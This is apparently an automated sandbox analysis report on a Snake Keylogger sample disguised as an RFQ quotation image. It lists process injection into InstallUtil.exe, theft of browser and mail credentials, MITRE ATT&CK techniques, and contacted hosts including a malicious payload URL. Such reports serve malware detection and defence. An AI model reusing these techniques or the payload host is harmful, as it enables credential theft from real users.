                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000Jump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000Jump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: DE8008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B5A008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 380000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 382000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3A2000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3A4000
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 54C008
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeQueries volume information: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeQueries volume information: C:\Users\user\AppData\Roaming\Gydvapkca.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeQueries volume information: C:\Users\user\AppData\Roaming\Gydvapkca.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4525996681.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524242471.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4524686788.0000000003043000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4525996681.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524242471.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5780, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5780, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4525996681.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524242471.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4524686788.0000000003043000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4525996681.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524242471.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5780, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		311
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		21
                Security Software Discovery                		Remote Services1
                Email Collection                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Registry Run Keys / Startup Folder                		1
                Scheduled Task/Job                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                DLL Side-Loading                		1
                Registry Run Keys / Startup Folder                		31
                Virtualization/Sandbox Evasion                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		311
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture13
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Obfuscated Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519289 Sample: RFQ____RM quotation_JPEG IM... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 32 reallyfreegeoip.org 2->32 34 wymascensores.com 2->34 36 2 other IPs or domains 2->36 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 10 other signatures 2->52 7 RFQ____RM quotation_JPEG IMAGE.img.exe 16 4 2->7         started        12 Gydvapkca.exe 14 2 2->12         started        14 Gydvapkca.exe 2->14         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 32->50 process4 dnsIp5 38 wymascensores.com 67.212.175.162, 443, 49704, 49712 SINGLEHOP-LLCUS United States 7->38 24 C:\Users\user\AppData\Roamingbehaviorgraphydvapkca.exe, PE32 7->24 dropped 26 C:\Users\...behaviorgraphydvapkca.exe:Zone.Identifier, ASCII 7->26 dropped 54 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->54 56 Writes to foreign memory regions 7->56 58 Allocates memory in foreign processes 7->58 16 InstallUtil.exe 14 2 7->16         started        60 Antivirus detection for dropped file 12->60 62 Multi AV Scanner detection for dropped file 12->62 64 Machine Learning detection for dropped file 12->64 20 InstallUtil.exe 2 12->20         started        66 Injects a PE file into a foreign processes 14->66 22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 reallyfreegeoip.org 188.114.96.3, 443, 49706, 49707 CLOUDFLARENETUS European Union 16->28 30 checkip.dyndns.com 158.101.44.242, 49705, 49708, 49710 ORACLE-BMC-31898US United States 16->30 40 Tries to steal Mail credentials (via file / registry access) 22->40 42 Tries to harvest and steal browser information (history, passwords, etc) 22->42 signatures10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ____RM quotation_JPEG IMAGE.img.exe63%ReversingLabsWin32.Trojan.SnakeKeylogger
                RFQ____RM quotation_JPEG IMAGE.img.exe100%AviraHEUR/AGEN.1323682
                RFQ____RM quotation_JPEG IMAGE.img.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Gydvapkca.exe100%AviraHEUR/AGEN.1323682
                C:\Users\user\AppData\Roaming\Gydvapkca.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Gydvapkca.exe63%ReversingLabsWin32.Trojan.SnakeKeylogger

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://checkip.dyndns.org/0%URL Reputationsafe
                https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                https://wymascensores.com/panel/Skdqhzzwa.mp30%Avira URL Cloudsafe
                http://checkip.dyndns.orgh0%Avira URL Cloudsafe
                https://wymascensores.com0%Avira URL Cloudsafe
                http://checkip.dyndns.com0%Avira URL Cloudsafe
                https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/8.46.123.33$0%Avira URL Cloudsafe
                https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                http://reallyfreegeoip.org0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                wymascensores.com
                		67.212.175.162
                		truetrue
                  		unknown
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truetrue
                    		unknown
                    checkip.dyndns.com
                    		158.101.44.242
                    		truefalse
                      		unknown
                      checkip.dyndns.org
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://wymascensores.com/panel/Skdqhzzwa.mp3true
                        • Avira URL Cloud: safe
                        		unknown
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        		unknown
                        https://reallyfreegeoip.org/xml/8.46.123.33false
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netiRFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://stackoverflow.com/q/14436606/23354RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://github.com/mgravell/protobuf-netJRFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.0000000004015000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://reallyfreegeoip.org/xml/8.46.123.33$InstallUtil.exe, 00000002.00000002.4524686788.0000000003027000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003035000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 